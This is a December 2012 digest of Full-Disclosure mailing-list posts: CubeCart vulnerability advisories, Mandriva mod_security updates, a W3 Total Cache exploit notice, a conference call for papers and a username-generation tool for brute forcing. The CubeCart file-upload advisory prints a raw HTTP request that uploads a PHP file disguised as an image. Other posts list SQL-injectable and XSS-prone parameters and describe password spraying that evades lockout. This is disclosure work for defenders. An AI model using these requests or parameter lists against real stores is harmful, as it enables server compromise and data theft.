and existing customers all over the world.

3. VULNERABILITY DESCRIPTION

CubeCart 4.4.6 and and lower versions contain a flaw that allows a
remote Cross-site Request Forgery (CSRF / XSRF) attack. The flaw
exists because the application does not require multiple steps or
explicit confirmation for sensitive transactions for majority of
administrator functions such as adding new user, assigning user to
administrative privilege. By using a crafted URL, an attacker may
trick the victim into visiting to his web page to take advantage of
the trust relationship between the authenticated victim and the
application. Such an attack could trick the victim into executing
arbitrary commands in the context of their session with the
application, without further prompting or verification.

4. VERSIONS AFFECTED

4.4.6 and lower

5. Proof-of-Concept

////////////////////////////////////////////////////////////////////////////////////
Add Admin User
==================

Add Coupon
==============

////////////////////////////////////////////////////////////////////////

6. SOLUTION

The CubeCart 4.x version family is no longer maintained by the vendor.
Upgrade to the currently supported latest CubeCart version - 5.x.

7. VENDOR

CubeCart Development Team
[cubecart.com]

8. CREDIT

Aung Khant, [yehg.net], YGN Ethical Hacker Group, Myanmar.

9. DISCLOSURE TIME-LINE

2012-12-22: CubeCart 4.x in End-of-Support/Maintenance circle
2012-12-24: Vulnerability disclosed

10. REFERENCES

Original Advisory URL:
[yehg.net]
CubeCart Home Page: [cubecart.com]
CubeCart Bug-Fix Announcement:
[forums.cubecart.com]

#yehg [2012-12-24]

---------------------------------
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
[yehg.net]
Our Lab | [yehg.net]
Our Directory | [yehg.net]

_______________________________________________
Full-Disclosure - We believe in it.
Charter: [lists.grok.org.uk]
Hosted and sponsored by Secunia - [secunia.com]

[Full-disclosure] CubeCart 4.4.6 and lower | Multiple SQL Injection Vulnerabilities (no replies)

YGN Ethical Hacker Group — Mon, 24 Dec 2012 20:32:12 +0800

1. OVERVIEW

The CubeCart 4.4.6 and lower versions are vulnerable to SQL Injection.

2. BACKGROUND

CubeCart is an "out of the box" ecommerce shopping cart software
solution which has been written to run on servers that have PHP &
MySQL support. With CubeCart you can quickly setup a powerful online
store which can be used to sell digital or tangible products to new
and existing customers all over the world.

3. VULNERABILITY DESCRIPTION

Multiple parameters are not properly sanitized, which allows attacker
to conduct SQL Injection attack. This could an attacker to inject or
manipulate SQL queries in the back-end database, allowing for the
manipulation or disclosure of arbitrary data.

4. VERSIONS AFFECTED

4.4.6 and lower

5. Affected URLs and Parameters

/admin.php (active parameter)
/admin.php (cat_id parameter)
/admin.php (orderCol parameter)
/admin.php (orderDir parameter)

6. SOLUTION

The CubeCart 4.x version family is no longer maintained by the vendor.
Upgrade to the currently supported latest CubeCart version - 5.x.

7. VENDOR

CubeCart Development Team
[cubecart.com]

8. CREDIT

Aung Khant, [yehg.net], YGN Ethical Hacker Group, Myanmar.

9. DISCLOSURE TIME-LINE

2012-12-22: CubeCart 4.x in End-of-Support/Maintenance circle
2012-12-24: Vulnerability disclosed

10. REFERENCES

Original Advisory URL:
[yehg.net]
CubeCart Home Page: [cubecart.com]
CubeCart Bug-Fix Announcement:
[forums.cubecart.com]
CubeCart4 End-of-Life Announcement:
[forums.cubecart.com]

#yehg [2012-12-24]
---------------------------------
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
[yehg.net]
Our Lab | [yehg.net]
Our Directory | [yehg.net]

_______________________________________________
Full-Disclosure - We believe in it.
Charter: [lists.grok.org.uk]
Hosted and sponsored by Secunia - [secunia.com]

[Full-disclosure] CubeCart 4.4.6 and lower | Multiple Cross Site Scripting Vulnerabilities (no replies)

YGN Ethical Hacker Group — Mon, 24 Dec 2012 20:32:12 +0800

1. OVERVIEW

CubeCart 4.4.6 and lower versions are vulnerable to Cross Site Scripting.

2. BACKGROUND

CubeCart is an "out of the box" ecommerce shopping cart software
solution which has been written to run on servers that have PHP &
MySQL support. With CubeCart you can quickly setup a powerful online
store which can be used to sell digital or tangible products to new
and existing customers all over the world.

3. VULNERABILITY DESCRIPTION

Multiple parameters are not properly sanitized, which allows attacker
to conduct Cross Site Scripting attack. This may allow an attacker to
create a specially crafted URL that would execute arbitrary script
code in a victim's browser.

4. VERSIONS AFFECTED

4.4.6 and lower

5. Affected URLs and Parameters

/admin.php (countiesPage parameter)
/admin.php (countriesPage parameter)
/admin.php (dStart parameter)
/admin.php (edit parameter)
/admin.php (email parameter)
/admin.php (FCKeditor parameter)
/admin.php (gc%5Bmax%5D parameter)
/admin.php (gc%5Bmin%5D parameter)
/admin.php (gc%5BproductCode%5D parameter)
/admin.php (gc%5Bweight%5D parameter)
/admin.php (gc[max] parameter)
/admin.php (gc[min] parameter)
/admin.php (gc[productCode] parameter)
/admin.php (gc[weight] parameter)
/admin.php (loc]
/admin.php (page parameter)
/admin.php (prod_master_id parameter)
/admin.php (searchStr parameter)
/admin.php (thumbName[] parameter)
/admin.php (User-Agent HTTP header)
/admin.php (yStart parameter)
/index.php (Referer HTTP header)

6. SOLUTION

The CubeCart 4.x version family is no longer maintained by the vendor.
Upgrade to the currently supported latest CubeCart version - 5.x.

7. VENDOR

CubeCart Development Team
[cubecart.com]

8. CREDIT

Aung Khant, [yehg.net], YGN Ethical Hacker Group, Myanmar.

9. DISCLOSURE TIME-LINE

2012-12-22: CubeCart 4.x in End-of-Support/Maintenance circle
2012-12-24: Vulnerability disclosed

10. REFERENCES

Original Advisory URL:
[yehg.net]
CubeCart Home Page: [cubecart.com]
CubeCart Bug-Fix Announcement:
[forums.cubecart.com]
CubeCart4 End-of-Life Announcement:
[forums.cubecart.com]

#yehg [2012-12-24]

---------------------------------
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
[yehg.net]
Our Lab | [yehg.net]
Our Directory | [yehg.net]

_______________________________________________
Full-Disclosure - We believe in it.
Charter: [lists.grok.org.uk]
Hosted and sponsored by Secunia - [secunia.com]

[Full-disclosure] CubeCart 5.0.7 and lower | Open URL Redirection Vulnerability (no replies)

YGN Ethical Hacker Group — Mon, 24 Dec 2012 20:25:41 +0800

1. OVERVIEW

CubeCart 5.0.7 and lower versions are vulnerable to Open URL Redirection.

2. BACKGROUND

CubeCart is an "out of the box" ecommerce shopping cart software
solution which has been written to run on servers that have PHP &
MySQL support. With CubeCart you can quickly setup a powerful online
store which can be used to sell digital or tangible products to new
and existing customers all over the world.

3. VULNERABILITY DESCRIPTION

CubeCart 5.0.7 and lower versions contain a flaw that allows a remote
cross site redirection attack. This flaw exists because the
application does not properly sanitise the "redir" parameter. This
allows an attacker to create a specially crafted URL, that if clicked,
would redirect a victim from the intended legitimate web site to an
arbitrary web site of the attacker's choice.

4. VERSIONS AFFECTED

5.0.7 and lower

5. Affected URL and Parameter

/admin.php (redir parameter)
/admin.php?redir=//yehg.net/%3f (Redirect after login)

6. SOLUTION

Upgrade to the latest CubeCart version - 5.x.

7. VENDOR

CubeCart Development Team
[cubecart.com]

8. CREDIT

Aung Khant, [yehg.net], YGN Ethical Hacker Group, Myanmar.

9. DISCLOSURE TIME-LINE

2012-03-24: Vulnerability reported
2012-12-24: Vulnerability disclosed

10. REFERENCES

Original Advisory URL:
[yehg.net]
CubeCart Home Page: [cubecart.com]

#yehg [2012-12-24]

_______________________________________________
Full-Disclosure - We believe in it.
Charter: [lists.grok.org.uk]
Hosted and sponsored by Secunia - [secunia.com]

[Full-disclosure] Wordpress Remote Exploit - W3 Total Cache (3 replies)

Jason A. Donenfeld — Tue, 25 Dec 2012 00:48:19 +0800

Hi all,

>From the developers' description [1], W3 Total Cache is:

> The most complete WordPress performance framework.
> Recommended by web hosts like: MediaTemple, Host Gator, Page.ly and WP Engine and countless more.
> Trusted by countless sites like: stevesouders.com, mattcutts.com, mashable.com, smashingmagazine.com, makeuseof.com, yoast.com, kiss925.com, pearsonified.com, lockergnome.com, johnchow.com, ilovetypography.com, webdesignerdepot.com, css-tricks.com and tens of thousands of others.
> W3 Total Cache improves the user experience of your site by improving your server performance, caching every aspect of your site, reducing the download times and providing transparent content delivery network (CDN) integration.
> Downloads: 1,388,876
> Ratings: 4.6 out of 5 stars

Unfortunately, it's frequently incorrectly deployed. When I set it up
by going to the Wordpress panel and choosing "add plugin" and
selecting the plugin from the Wordpress Plugin Catalog (or whatever),
it left two avenues of attack open:

1) Directory listings were enabled on the cache directory, which means
anyone could easily recursively download all the database cache keys,
and extract ones containing sensitive information, such as password
hashes. A simple google search of
"inurl:wp-content/plugins/w3tc/dbcache" and maybe some other magic
reveals this wasn't just an issue for me. As W3 Total Cache already
futzes with the .htaccess file, I see no reason for it not to add
"Options -Indexes" to it upon installation. I haven't read any W3
documentation, so it's possible this is a known and documented
misconfiguration, but maybe not.

2) Even with directory listings off, cache files are by default
publicly downloadable, and the key values / file names of the database
cache items are easily predictable. Again, it seems odd that "deny
from all" isn't added to the .htaccess file. Maybe it's documented
somewhere that you should secure your directories, or maybe it isn't;
I'm not sure.

If I had to categorize these holes, I'd say they're due to
"misconfiguration", but I figure it's relevant to write in to
full-disclosure & webappsec because I'm usually not horrible with
configuring things and I made these mistakes several times without
realizing. I'm copying the author on this email, as he may want to
include a warning message where nieve folks like myself can see it, or
document these somewhere if they're not already, or at least apply the
two .htaccess tweaks mentioned above.

Anyway I put together a short and simple shell script that works
pretty decently against my own various wordpress websites, and
exploits the configuration error in point (2) above. Exploiting point
(1) can be done with wget & grep and is even more dull than the below
exploit.

****************
W3 Total Fail

Exploit for point (2):
[git.zx2c4.com] (Read the
entire usage message.)

Screencast for point (2):
[git.zx2c4.com] or
[www.youtube.com]

****************

Merry Christmas.

- Jason
zx2c4

[1] [wordpress.org]

_______________________________________________
Full-Disclosure - We believe in it.
Charter: [lists.grok.org.uk]
Hosted and sponsored by Secunia - [secunia.com]

[Full-disclosure] [ MDVSA-2012:183 ] apache-mod_security (no replies)

Anonymous User — Mon, 24 Dec 2012 05:45:18 +0800

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory MDVSA-2012:183
[www.mandriva.com]
_______________________________________________________________________

Package : apache-mod_security
Date : December 23, 2012
Affected: Enterprise Server 5.0
_______________________________________________________________________

Problem Description:

A vulnerability has been discovered and corrected in
apache-mod_security:

ModSecurity <= 2.6.8 is vulnerable to multipart/invalid part
ruleset bypass, this was fixed in 2.7.0 (released on2012-10-16)
(CVE-2012-4528).

The updated packages have been patched to correct this issue.
_______________________________________________________________________

References:

[cve.mitre.org]
_______________________________________________________________________

Updated Packages:

Mandriva Enterprise Server 5:
18413b1e0520660d62de9e65fb2481ce mes5/i586/apache-mod_security-2.5.12-0.3mdvmes5.2.i586.rpm
6bd19e22c13a4b5aca610c6a7049792a mes5/i586/mlogc-2.5.12-0.3mdvmes5.2.i586.rpm
70689b90d15d7fba2ae35c8a4c40a960 mes5/SRPMS/apache-mod_security-2.5.12-0.3mdvmes5.2.src.rpm

Mandriva Enterprise Server 5/X86_64:
bea5768d5f9a05b8d53426708ac7362d mes5/x86_64/apache-mod_security-2.5.12-0.3mdvmes5.2.x86_64.rpm
eea9adbbbfed5e5514a0370d2ff5b4c7 mes5/x86_64/mlogc-2.5.12-0.3mdvmes5.2.x86_64.rpm
70689b90d15d7fba2ae35c8a4c40a960 mes5/SRPMS/apache-mod_security-2.5.12-0.3mdvmes5.2.src.rpm
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

[www.mandriva.com]

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)

iD8DBQFQ1076mqjQ0CJFipgRAmksAJ0S6kPArq56K3HgMfddaQaG7VXjIgCfTkHS
o+UKMo90pYCRMwVLHAzLh6Y=
=d+2j
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: [lists.grok.org.uk]
Hosted and sponsored by Secunia - [secunia.com]

[Full-disclosure] [ MDVSA-2012:182 ] apache-mod_security (no replies)

Anonymous User — Mon, 24 Dec 2012 05:34:02 +0800

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory MDVSA-2012:182
[www.mandriva.com]
_______________________________________________________________________

Package : apache-mod_security
Date : December 23, 2012
Affected: 2011.
_______________________________________________________________________

Problem Description:

Multiple vulnerabilities has been discovered and corrected in
apache-mod_security:

ModSecurity before 2.6.6, when used with PHP, does not properly handle
single quotes not at the beginning of a request parameter value in
the Content-Disposition field of a request with a multipart/form-data
Content-Type header, which allows remote attackers to bypass filtering
rules and perform other attacks such as cross-site scripting (XSS)
attacks. NOTE: this vulnerability exists because of an incomplete
fix for CVE-2009-5031 (CVE-2012-2751).

ModSecurity <= 2.6.8 is vulnerable to multipart/invalid part
ruleset bypass, this was fixed in 2.7.0 (released on2012-10-16)
(CVE-2012-4528).

The updated packages have been patched to correct these issues.
_______________________________________________________________________

References:

[cve.mitre.org]
[cve.mitre.org]
_______________________________________________________________________

Updated Packages:

Mandriva Linux 2011:
97ce3bb44e48983170bd6f112a578c3c 2011/i586/apache-mod_security-2.6.1-1.1-mdv2011.0.i586.rpm
044aa147cd2c9b4989f47a74d04f3a62 2011/i586/mlogc-2.6.1-1.1-mdv2011.0.i586.rpm
4657a73f501344810c72d76c58532190 2011/SRPMS/apache-mod_security-2.6.1-1.1.src.rpm

Mandriva Linux 2011/X86_64:
d5e55155f32a9118977a96ea86efe1cf 2011/x86_64/apache-mod_security-2.6.1-1.1-mdv2011.0.x86_64.rpm
61d99efd771a68bb801b602294ce6efb 2011/x86_64/mlogc-2.6.1-1.1-mdv2011.0.x86_64.rpm
4657a73f501344810c72d76c58532190 2011/SRPMS/apache-mod_security-2.6.1-1.1.src.rpm
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

[www.mandriva.com]

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)

iD8DBQFQ10wDmqjQ0CJFipgRAps5AJ4qK+9Wd2lVri03D+VVzWRgksdTkgCeOOeZ
jnUCJwVJ+dnG0N7muIDsCFM=
=u8HT
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: [lists.grok.org.uk]
Hosted and sponsored by Secunia - [secunia.com]

[Full-disclosure] dyne_bolic hacked? (2 replies)

Anonymous User — Tue, 25 Dec 2012 21:19:46 +0800

anyone seen this yet? its been floating around irc tonight. supposed to be
Dyne.org (the people who make the Dyne_Bolic OS) hacked. good thing i use
BSD!

Title: EGO[0] zine
Link: [pastebin.com]

_______________________________________________
Full-Disclosure - We believe in it.
Charter: [lists.grok.org.uk]
Hosted and sponsored by Secunia - [secunia.com]

[Full-disclosure] CubeCart 3.0.20 (3.0.x) and lower | Multiple SQL Injection Vulnerabilities (no replies)

YGN Ethical Hacker Group — Sun, 23 Dec 2012 19:51:08 +0800

1. OVERVIEW

The CubeCart 3.0.20 and lower versions are vulnerable to SQL Injection.

2. BACKGROUND

CubeCart is an "out of the box" ecommerce shopping cart software
solution which has been written to run on servers that have PHP &
MySQL support. With CubeCart you can quickly setup a powerful online
store which can be used to sell digital or tangible products to new
and existing customers all over the world.

3. VULNERABILITY DESCRIPTION

Multiple parameters are not properly sanitized, which allows attacker
to conduct SQL Injection attack. This could an attacker to inject or
manipulate SQL queries in the back-end database, allowing for the
manipulation or disclosure of arbitrary data.

4. VERSIONS AFFECTED

3.0.20 and lower (aka 3.0.x family)

5. Affected URLs and Parameters

//cube/admin/products/extraCats.php (add parameter)
/cube/admin/products/index.php (cat_id parameter)
/cube/admin/products/index.php (category parameter)
/cube/admin/products/index.php (orderCol parameter)
/cube/admin/products/index.php (orderDir parameter)
/cube/admin/products/options.php (masterProduct parameter)
/cube/admin/settings/currency.php (active parameter)

6. SOLUTION

The CubeCart 3.0.x version family is no longer maintained by the vendor.
Upgrade to the currently supported CubeCart version - 5.x.

7. VENDOR

CubeCart Development Team
http:/cart.com/

8. CREDIT

Aung Khant, [yehg.net], YGN Ethical Hacker Group, Myanmar.

9. DISCLOSURE TIME-LINE

2012-02-10: CubeCart 3.0.x in End-of-Support/Maintenance circle
2012-12-22: Vulnerability disclosed

10. REFERENCES

Original Advisory URL:
[yehg.net]
CubeCart Home Page: [cubecart.com]

#yehg [2012-12-22]

---------------------------------
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
[yehg.net]
Our Lab | [yehg.net]
Our Directory | [yehg.net]

_______________________________________________
Full-Disclosure - We believe in it.
Charter: [lists.grok.org.uk]
Hosted and sponsored by Secunia - [secunia.com]

[Full-disclosure] Recruiting Troopers - Call for Papers, March 13-14 2013 (no replies)

Enno Rey — Sun, 23 Dec 2012 08:00:20 +0800

Once more, it will be Troopers time.

This year was an extraordinary event. Everybody involved had so much fun (in the end, the term "best security con. ever" got a bit overstressed ;-) and we had so many great talks... it seems quite difficult to do even better next year. Still, we'll try.
You can be part of it. Again, Troopers - www.troopers.de - will be held in the beautiful city of Heidelberg/Germany (on 03/13 and 03/14 2013) and will feature two tracks, one on attack techniques and security research, the other focused on the defense side and management aspects of the infosec world. You might look at [www.troopers.de] to get an idea of the spirit of the event.

This call for papers addresses security researchers interested in sharing their work with other researchers and a high level audience (composed of about 60% people from industry, 20% from academia and another 20% from [research] community). We would like to invite everyone with special knowledge in breaking security in whatever area or practical experience in securing complex information systems to present their skills, tools or experience.

Speaker Privileges
==================

We will cover the flight costs (limited to EUR 750 for speakers from Europe and US$ 1800 for speakers from other continents) and three nights of accomodation, plus "some evening fun and other amenities". To get an idea of our speaker treatment see [www.elladodelmal.com] ;-)

"Fresh Headz"
=============

Given an appropriate subject and technical level we're happy to welcome "fresh speakers" (not seen in various places before) and we're happy to help you with setting up your talk (or getting over your pre-talk excitement).

Submissions
===========

We are mainly interested in talks on

Security in a Mobile World
Virtualization & Cloud Stuff
Embedded Devices
Industrial Networking
Security in Telco Environments
Secure Coding & Advances in the Software Security Space
Feasible Risk Assessment Approaches
Digital Certificates in 2013
IPv6

Obviously heavy vendor-pitching will not be welcomed warmly and we reserve the right to ask for modifications of confirmed talks if we have the impression there's too much of that in a talk.

CFP submissions [to cfp@troopers.de or/and simply reply to this mail] must include the following information:

1) Brief biography including list of publications and papers published previously.

2) Proposed presentation title & synopsis/description.

3) Contact Information (full name, alias, handle, e-mail, postal address, phone, country of origin, special meal requirement, smoking habits ;-).

4) Employment and/or affiliations information.

5) Why is your material different or innovative or significant?

Please note that all speakers will be allocated 55 minutes of presentation time + 5 minutes Q+A. Any speakers that require more time must inform the CFP committee in the course of the submission.

By agreeing to speak at Troopers 13 you are granting ERNW GmbH the rights to reproduce, distribute, advertise and show your presentation including but not limited to [www.troopers.de], printed and/or electronic advertisements, and all other mediums.

Important Dates
===============

Deadline for Submission: 15 Jan 2013,
Final Notification: 01 Feb 2013,
Presentation slides due: 01 Mar 2013
The conference: 13-14 Mar 2013.

==================

thanks,

Enno

--
Enno Rey

ERNW GmbH - Carl-Bosch-Str. 4 - 69115 Heidelberg - www.ernw.de
Tel. +49 6221 480390 - Fax 6221 419008 - Cell +49 174 3082474
PGP FP 055F B3F3 FE9D 71DD C0D5 444E C611 033E 3296 1CC1

Handelsregister Mannheim: HRB 337135
Geschaeftsfuehrer: Enno Rey

=======================================================
Blog: www.insinuator.net || Conference: www.troopers.de
=======================================================

_______________________________________________
Full-Disclosure - We believe in it.
Charter: [lists.grok.org.uk]
Hosted and sponsored by Secunia - [secunia.com]

[Full-disclosure] Multiple vulnerabilities in multiple themes for WordPress (no replies)

MustLive — Sun, 23 Dec 2012 07:45:02 +0800

Hello list!

Some time ago, when I've found vulnerabilities in plugin BuddyPress for
WordPress (particularly in Affinity BuddyPress theme for it) with Rokbox,
which I disclosed earlier, I also found multiple vulnerable themes for WP
with Rokbox.

So I want to warn you about multiple vulnerabilities in multiple themes for
WordPress. These are themes developed by Rokbox's developers. And they put
Rokbox (with JW Player, but without TimThumb) into their themes.

These are Content Spoofing, Cross-Site Scripting, Full path disclosure and
Information Leakage vulnerabilities. I've disclosed vulnerabilities in JW
Player in June and August (including in commercial version JW Player Pro)
and disclosed vulnerabilities in Rokbox in December. These vulnerabilities
are similar to vulnerabilities in Affinity BuddyPress theme. Also I've found
many WP themes by other developers with Rokbox, but I'd write about them
separately, because they have much more holes.

-------------------------
Affected products:
-------------------------

Vulnerable are all WordPress themes by RocketTheme (during quick research I
found 16 themes for WP, in addition to above-mentioned theme for BP, but I
supposed all their themes contain Rokbox with JW Player 4.4.198). They
haven't removed this vulnerable version of JW Player from Rokbox and so from
any of their themes (for WP and BP), when I've informed them in August.

Here are these 16 vulnerable themes, which I found:

rt_afterburner_wp
rt_refraction_wp
rt_solarsentinel_wp
rt_mixxmag_wp (Mixxmag)
rt_iridium_wp
rt_infuse_wp (infuse)
rt_perihelion_wp
rt_replicant2_wp
rt_affinity_wp
rt_nexus_wp
rt_sentinel
rt_mynxx_wp_vestnikp
rt_mynxx_wp (rt.mynxx.wp)
rt_moxy_wp
rt_terrantribune_wp
rt_meridian_wp

They will be added to those 94 vulnerable themes for WordPress, in which
I've found vulnerabilities (http://websecurity.com.ua/4915/).

In Google's index there are now up to 634000 pages with Rokbox at WP sites.
So there are a lot of vulnerable themes and web sites with these themes.

----------
Details:
----------

The paths for these themes are the next:

[site]

[site]

[site]

[site]
[site]

[site]

[site]
[site]

[site]

[site]

[site]

[site]

[site]

[site]

[site]
[site]

[site]

[site]

[site]

Content Spoofing (WASC-12):

In parameter file there can be set as video, as audio files.

Swf-file of JW Player accepts arbitrary addresses in parameters file and
image, which allows to spoof content of flash - i.e. by setting addresses of
video (audio) and/or image files from other site.

[site]
[site]

Content Spoofing (WASC-12):

Swf-file of JW Player accepts arbitrary addresses in parameter config, which
allows to spoof content of flash - i.e. by setting address of config file
from other site (parameters file and image in xml-file accept arbitrary
addresses). For loading of config file from other site it needs to have
crossdomain.xml.

[site]

1.xml

1.flv
1.jpg

Content Spoofing (WASC-12):

[site]

XSS (WASC-08):

[site]

Full path disclosure (WASC-13):

In all these themes there is FPD in index.php
(http://site/wordpress/wp-content/themes/rt_afterburner_wp/ and the same for
other themes), which works at default PHP settings. Also potentially there
are FPD in other php-files of these themes.

Information Leakage (WASC-13):

There are sites with rt_mixxmag_wp theme, which have error log with full
paths.

[site]

------------
Timeline:
------------

2012.05.29 - informed developers of JW Player.
2012.06.06 - disclosed at my site about JW Player.
2012.08.18 - informed developers about new holes in JW Player Pro.
2012.08.23 - disclosed at my site about JW Player Pro.
2012.08.28 - informed developers of Rokbox.
2012.12.14 - disclosed at my site about Rokbox.
2012.12.23 - disclosed to the lists about multiple themes for WordPress with
Rokbox.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
[websecurity.com.ua]

_______________________________________________
Full-Disclosure - We believe in it.
Charter: [lists.grok.org.uk]
Hosted and sponsored by Secunia - [secunia.com]

[Full-disclosure] CubeCart 3.0.20 (3.0.x) and lower | Multiple Cross Site Scripting Vulnerabilities (no replies)

YGN Ethical Hacker Group — Sun, 23 Dec 2012 05:47:38 +0800

[Full-disclosure] CubeCart 3.0.20 (3.0.x) and lower | Arbitrary File Upload (no replies)

YGN Ethical Hacker Group — Sun, 23 Dec 2012 05:32:31 +0800

1. OVERVIEW

CubeCart 3.0.20 and lower versions are vulnerable to Arbitrary File Upload.

2. BACKGROUND

CubeCart is an "out of the box" ecommerce shopping cart software
solution which has been written to run on servers that have PHP &
MySQL support. With CubeCart you can quickly setup a powerful online
store which can be used to sell digital or tangible products to new
and existing customers all over the world.

3. VULNERABILITY DESCRIPTION

CubeCart 3.0.20 and lower versions contain a flaw related to the
/admin/filemanager/upload.php script's failure to properly validate
uploaded files. This may allow a remote attacker to upload arbitrary
files and execute arbitrary code via a request to the 'atm-regen'
parameter.

4. VERSIONS AFFECTED

3.0.20 and lower (aka 3.0.x family)

5. PROOF-OF-CONCEPT/EXPLOIT

Set content type to image/jpeg and upload.
Uploaded files are stored at images/uploads.

/////////////////////////////////////////////////////////////////////
POST /cube/admin/filemanager/upload.php HTTP/1.1
Host:localhost
Referer: [localhost]
Cookie: ccSIDb4c410adddf67168ce2ac0e2807326f8=f2c0bc69b813778a644b76c2b40c7ce0;
Content-Type: multipart/form-data;
boundary=---------------------------24464570528145
Content-Length: 29

-----------------------------24464570528145
Content-Disposition: form-data; name="FCKeditor_File"; filename="cmd.php"
Content-Type: image/jpeg

-----------------------------24464570528145
Content-Disposition: form-data; name="submit"

Upload Image
-----------------------------24464570528145
Content-Disposition: form-data; name="redir"

0
-----------------------------24464570528145
Content-Disposition: form-data; name="custom"

1
-----------------------------24464570528145--

///////////////////////////////////////////////////////////////

6. SOLUTION

The CubeCart 3.0.x version family is no longer maintained by the vendor.
Upgrade to the currently supported CubeCart version - 5.x.

7. VENDOR

CubeCart Development Team
http:/cart.com/

8. CREDIT

Aung Khant, [yehg.net], YGN Ethical Hacker Group, Myanmar.

9. DISCLOSURE TIME-LINE

2012-02-10: CubeCart 3.0.x in End-of-Support/Maintenance circle
2012-12-22: Vulnerability disclosed

10. REFERENCES

Original Advisory URL:
[yehg.net]
CubeCart Home Page: [cubecart.com]

#yehg [2012-12-22]

---------------------------------
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
[yehg.net]
Our Lab | [yehg.net]
Our Directory | [yehg.net]

_______________________________________________
Full-Disclosure - We believe in it.
Charter: [lists.grok.org.uk]
Hosted and sponsored by Secunia - [secunia.com]

[Full-disclosure] New Tool: Username Anarchy (no replies)

Andrew Horton — Sat, 22 Dec 2012 17:15:27 +0800

Hi FD,

Have you ever discovered a user's real name on a pentest and then had to make a list of potential
usernames so you could bruteforce some passwords, Apache home directories, etc? It sucked didn't
it..? With username-anarchy you can generate usernames without tears.

Feedback is welcome.

Username Anarchy
======================================

* Version: 0.2 (November 2012)
* Author: urbanadventurer (Andrew Horton)
* Homepage: [www.morningstarsecurity.com]
* Download: [github.com]

Description
------------
Tools for generating usernames when penetration testing. *Usernames are half the password brute
force problem.*

This is useful for user account/password brute force guessing and username enumeration when
usernames are based on the users' names. By attempting a few weak passwords across a large set of
user accounts, user account lockout thresholds can be avoided.

Users' names can be identified through a variety of methods:
* Web scraping employee names from LinkedIn, Facebook, and other social networks.
* Extracting metadata from document types such as PDF, Word, Excel, etc. This can be performed with
FOCA.

Common aliases, or self chosen usernames, from forums are also included.

Features
--------

* Plugin architecture for username formats
* Format string style username format definitions
* Substitutions. e.g. when only a first initial and lastname is known (LinkedIn lists users like
this), it will attempt all possible first names
* Country databases of common first and last names from Familypedia and PublicProfiler
* Has the Facebook common first and lastnames lists

Extras
------

* Common forum usernames, ordered by popularity

Usage
-----
Username Anarchy is a command line tool.

Usage: ./username-anarchy [OPTIONS]... [firstname|first last|first middle last]
Version: 0.2

NAMES
--input-file, -i=FILE Input list of names. Can be CSV or TAB delimited.
Valid column headings are: firstinitial,firstname,
lastinitial,lastname,middleinitial,middlename
--auto, -a Automatically generate names from a country or other lists.
--country COUNTRY, -c COUNTRY can be one of the following datasets:
PublicProfiler:
argentina, austria, belgium, canada, china, denmark, france,
germany,
hungary, india, ireland, italy, luxembourg, netherlands,
newzealand,
norway, poland, serbia, slovenia, spain, sweden,
switzerland, uk, us
Other:
Facebook - uses the Facebook top 10,000 first and last names
--given-names=FILE Dictionary of given names
--family-names=FILE Dictionary of family names
--substitute, -s=STATE Control name substitutions.
Valid values are 'on' and 'off'. Default: off
Can substitute any part of a name not available.
--max-substitutions, -m=NUM Limit quantity of substitutions per plugin.
Default: -1 (Unlimited)

USERNAME FORMAT
--list-formats, -l List format plugins
--select-format, -f=LIST Select format plugins by name. Comma delimited list
--recognise, -r=USERNAME Recognise which format is in use for a username. This
uses the Facebook dataset. Use verbose mode to show progress.

MISC
--verbose, -v Display plugin format comments in output and displays last name
searches
in plugin format recogniser
--help, -h This help

Example Usage
-------------
### You know the name of a user but not the username format

./username-anarchy anna key
anna
annakey
anna.key
annakey
annak
a.key
akey
kanna
k.anna
...

### You know the username format and names of users

./username-anarchy --input-file ./test-names.txt --select-format first.last
andrew.horton
jim.vongrippenvud
peter.otoole

### You know the server is in France
Note that -a or --auto is required when you do not specify any input names.

./username-anarchy --country france --auto
martin
bernard
thomas
durand
richard
robert
petit
moreau
dubois
simon
martinsmith
martinjohnson
...

### List username format plugins

./username-anarchy --list-formats
Plugin name Example
--------------------------------------------------------------------------------
first anna
firstlast annakey
first.last anna.key
firstlast[8] annakey
firstl annak
f.last a.key
flast akey
lfirst kanna
l.first k.anna
lastf keya
last key
last.f key.a
last.first key.anna
FLast AKey
first1 anna0,anna1,anna2
fl ak
fmlast abkey
firstmiddlelast annaboomkey
fml abk
FL AK
FirstLast AnnaKey
First.Last Anna.Key
Last Key
FML ABK

### Automatically recognise the username format in use
./username-anarchy --recognise j.smith
Recognising j.smith. This can take a while.
Username format j.smith recognised. Plugin name: f.last

Input Files
-----------
To generate usernames for more than one user account you must provide the names in a text file.
This can be either TAB or CSV delimited.

### Example 1
Firstname,Lastname
Andrew,Horton
Jim, von Grippenvud
Peter,O'Toole

### Example 2
LinkedIn often shows the firstname and last initial

firstname,lastinitial
andrew,h
foo,b

